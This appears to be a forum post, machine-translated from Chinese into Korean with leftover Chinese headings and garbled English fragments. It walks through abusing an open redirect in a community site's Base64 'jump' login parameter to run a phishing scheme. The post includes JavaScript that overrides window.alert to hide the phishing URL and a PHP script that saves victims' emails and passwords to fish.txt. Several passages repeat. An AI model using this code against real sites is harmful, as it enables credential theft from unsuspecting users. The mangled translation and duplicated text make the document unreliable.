KoreanHackerTeam
Moderator
허점 자체는 해롭지 않으며 약간과 함께 사용하는 것이 매우 재미 있습니다.
위의 빨간색 상자에서 점프 한 후 컨텐츠에 대한 Base64는 :https://www.secquan.org입니다.
여기에서 https://www.baidu.com에서 Base64로 암호화 된 내용을 교체하면 구성된 링크는 다음과 같습니다.
성공적으로 로그인하면 자동으로 Baidu로 이동합니다.
실제로 팝업 창의 제목은 기본적으로 URL에 의해 표시되므로 주소가 직접 노출됨을 의미합니다. Alert 메소드를 다시 작성하려면 JS 조각을 추가하십시오.
12345678910111ScriptWindow.alert=function (name) {var iframe=document.createElement ( 'iframe'); iframe.style.display='none'; iframe.setattribute ( 'src', 'data:text/plain,'); document.documentElement.appendChild (iframe); window.frames [0] .window.alert (이름); iframe.parentNode.removeChild (iframe);} Alert ( '계정 예외, 다시 로그인);/Sctrl+S Suctrate of the the Suctate of the the Suctate of the Commonde Prede of the Commonte Pectate') 로컬 로그인하고 계정 비밀번호를받은 PHP 파일과 함께 일부 수정을했습니다. 잠시 후, 검증 코드를 호출 할 수 없다는 것을 알았으므로 직접 삭제했습니다. 이 검증 코드가 가장 실패한 곳이라고 생각했습니다.
마지막으로, 사용자가 입력 한 콘텐츠는 같은 디렉토리의 Fish.txt에 기록되며 페이지는 https://www.secquan.org로 리디렉션됩니다. 이전의 성공적인 로그인 세션이 여전히 존재하므로 직접 로그인됩니다.
漏洞详情
서클 커뮤니티 로그인 홈페이지 기본 링크 : https://www.secquan.org/login?jump=AHR0CHM6LY93D3CUC2VJCXVHBI5VCMC=위의 빨간색 상자에서 점프 한 후 컨텐츠에 대한 Base64는 :https://www.secquan.org입니다.
여기에서 https://www.baidu.com에서 Base64로 암호화 된 내용을 교체하면 구성된 링크는 다음과 같습니다.
로드 중...
www.secquan.org

利用设想

实际利用
访问构造好的钓鱼链接,正常登陆
(제한된 능력, 완벽하지는 않지만 그렇습니다) :先看一下页面跳转时弹窗的效果
※ 以下均在qq中测试效果
실제로 팝업 창의 제목은 기본적으로 URL에 의해 표시되므로 주소가 직접 노출됨을 의미합니다. Alert 메소드를 다시 작성하려면 JS 조각을 추가하십시오.
12345678910111ScriptWindow.alert=function (name) {var iframe=document.createElement ( 'iframe'); iframe.style.display='none'; iframe.setattribute ( 'src', 'data:text/plain,'); document.documentElement.appendChild (iframe); window.frames [0] .window.alert (이름); iframe.parentNode.removeChild (iframe);} Alert ( '계정 예외, 다시 로그인);/Sctrl+S Suctrate of the the Suctate of the the Suctate of the Commonde Prede of the Commonte Pectate') 로컬 로그인하고 계정 비밀번호를받은 PHP 파일과 함께 일부 수정을했습니다. 잠시 후, 검증 코드를 호출 할 수 없다는 것을 알았으므로 직접 삭제했습니다. 이 검증 코드가 가장 실패한 곳이라고 생각했습니다.

首页成品是这样的(勉勉强强以假乱真)
1234567? php $ email=$ _ post [ 'email']; $ password=$ _ post [ 'password']; $ result=$ email. '|'. $ password; file_put_contents ( 'fish.txt', $ result.php_eol, file_append); echo 'scriptwindow.location.href='https://www.secquan.org '/script';后台简单写个接收账号密码的php页面

마지막으로, 사용자가 입력 한 콘텐츠는 같은 디렉토리의 Fish.txt에 기록되며 페이지는 https://www.secquan.org로 리디렉션됩니다. 이전의 성공적인 로그인 세션이 여전히 존재하므로 직접 로그인됩니다.